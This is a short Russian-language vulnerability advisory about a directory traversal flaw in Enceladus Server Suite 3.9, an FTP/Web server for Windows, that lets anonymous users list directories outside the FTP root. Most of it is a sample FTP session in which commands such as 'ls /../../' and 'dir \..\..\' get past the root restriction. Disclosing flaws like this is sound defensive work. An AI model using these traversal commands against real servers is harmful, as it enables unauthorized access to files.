Уязвимость проверки правильности ввода обнаружена в Enceladus Server Suite – Web/FTP сервере для Windows. Удаленный авторизованный пользователь, в т.ч. и анонимный пользователь, может просматривать содержание каталогов на уязвимой системе.

Как сообщается, Enceladus Server Suite не фильтрует «\..» и «/..» последовательности символов в запросах пользователя. В результате удаленный авторизованный пользователь может представить специально сформированный запрос, который
раскроет содержание каталогов вне FTP root каталога.

Уязвимость обнаружена в Enceladus Server Suite 3.9 Пример:

Connected to 192.168.1.199.
220 Mollensoft FTP Server Ready.
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
index.html
readme.txt
226 Listing complete.
ftp: 24 bytes received in 0,00Seconds 24000,00Kbytes/sec.
ftp> cd ..
550 Access denied
ftp> cd …
550 Access denied
ftp> cd \..\
550 Access denied
ftp> cd/../
Invalid command.
ftp> cd /../
550 Access denied
ftp> ls /../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> ls /../../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> ls \..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> dir \..\..\
200 PORT command successful
….



Оставить мнение